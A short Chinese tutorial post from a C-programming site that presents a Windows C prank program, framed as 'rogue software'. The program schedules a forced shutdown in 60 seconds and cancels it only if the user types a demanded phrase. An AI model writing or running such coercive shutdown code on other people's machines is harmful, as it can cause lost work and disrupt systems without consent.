今天教大家做個流氓軟件……
打開時是這個樣子滴:
媽蛋,截圖截的差點關(guān)機,為了截圖就做一回變態(tài)吧TAT……
童靴們可以用下面的代碼去試驗一下,作一作死:
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> int main() { char write[100]; system("title c語言研究中心 www.sztianhecheng.cn"); system( "shutdown -s -t 60"); th: printf( "我是來自c語言網(wǎng)的流氓軟件,快說你愛鳳姐!不然就關(guān)機!\n" ); scanf( "%s", write); if (strcmp(write, "我愛鳳姐" ) == 0) { printf( "哈哈,你這個變態(tài)~\n" ); system( "shutdown -a"); system("pause"); } else { printf( "不想說?等著關(guān)機吧哼哼!\n" ); goto th; } return 0; }
C語言研究中心www.sztianhecheng.cn